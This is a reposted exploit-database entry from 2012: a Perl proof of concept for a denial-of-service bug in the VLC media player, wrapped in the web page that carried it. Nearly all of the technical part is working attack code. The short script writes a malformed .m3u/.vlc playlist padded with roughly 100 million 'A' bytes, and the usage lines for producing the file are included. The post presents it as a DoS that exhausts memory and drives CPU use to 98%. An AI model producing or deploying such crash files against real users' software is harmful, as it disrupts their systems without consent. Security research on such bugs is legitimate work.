| 
 VLC All versions - .m3u/.vlc DoS Memory Exhaustion Vulnerability 
				  | 
 
 
|  
来源:www.datasec.x90x.net 作者:Dark-Puzzle 发布时间:2012-08-20 
   | 
 
 
 
 | 
	 #!/usr/bin/perl # 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 # 0      _                   __           __       __                      1 # 1    /' \            __  /'__`\        /\ \__  /'__`\                    0 # 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1 # 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0 # 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1 # 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0 # 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1 # 1                   \ \____/ >> Exploit database separated by exploit    0 # 0                    \/___/          type (local, remote, DoS, etc.)     1 # 1                                                                        1 # 0   [x] Official Website: http://www.1337day.com                         0 # 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1 # 0                                                                        0 # 1               ==========================================               1 # 0                   I'm Dark-Puzzle From Inj3ct0r TEAM                   0 # 0                                                                        1 # 1                       dark-puzzle[at]live[at]fr                        0 # 0               ==========================================               1 # 1                 Pentesting/exploit coding/bug research                 0 # 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1           # Exploit Title: VLC All versions - .m3u/.vlc DoS Memory Exhaustion Vulnerability . # Date: 19 August 2012 # Author: Dark-Puzzle # Author's Website : www.datasec.x90x.net # Risk : Medium # Vendor Website : http://www.videolan.org # Version: All Versions Are Vulnerable . # Category: DoS/PoC # Tested on: Windows Xp Service Pack 2 / Windows 7 (64 bit).
  #About #The Vuln Consists that VLC player displays the Internal content of the .m3u and .vlc files , the content isn't  #known by VLC so it Will be displayed in the error log (All The Content) & in the Stack (Only the "A"s) increasing & increasing causing the DoS Vuln .  #The System Performance is Increased when the exploit is running and the CPU Usage can reach 98% . #the file may take some time to create and 4 seconds before it starts playing .
  # The Same file can be used for both .m3u & .vlc   #Usage : perl dos.pl > file.m3u # OR     perl dos.pl > file.vlc
  my $ext = "\x23\x45\x58\x54\x4d\x33\x55"; my $ff= "\x00\x00\x00\x00\x41\x41\x00\x00\x00\x00"; my $b = "\x41" x 99989969 ; my $c = "\xff" x 100 ; print $ext.$ff.$b.$c.$ff;
  #-----------------Solution-------------------# # Vendor has been contacted about this issue # #--------------------------------------------#
  #Greetz to : Inj3ct0r Team - Packetstormsecurity.org - Securityfocus.com - Jigsaw - Dark-Soldier ...
  
	
  | 
 
 
|   | 
 
  | 
 
 
 
[ 推荐] 
[ 评论(0条)] 
[返回顶部] [打印本页] 
[关闭窗口]    | 
 
 
|  
 | 
 
 
|   | 
 
  | 
 
  
 | 
 
        
  | 
  | 
推荐广告 | 
 
  | 
 
  | 
 
| 
	
		
		
 | 
 
 
 |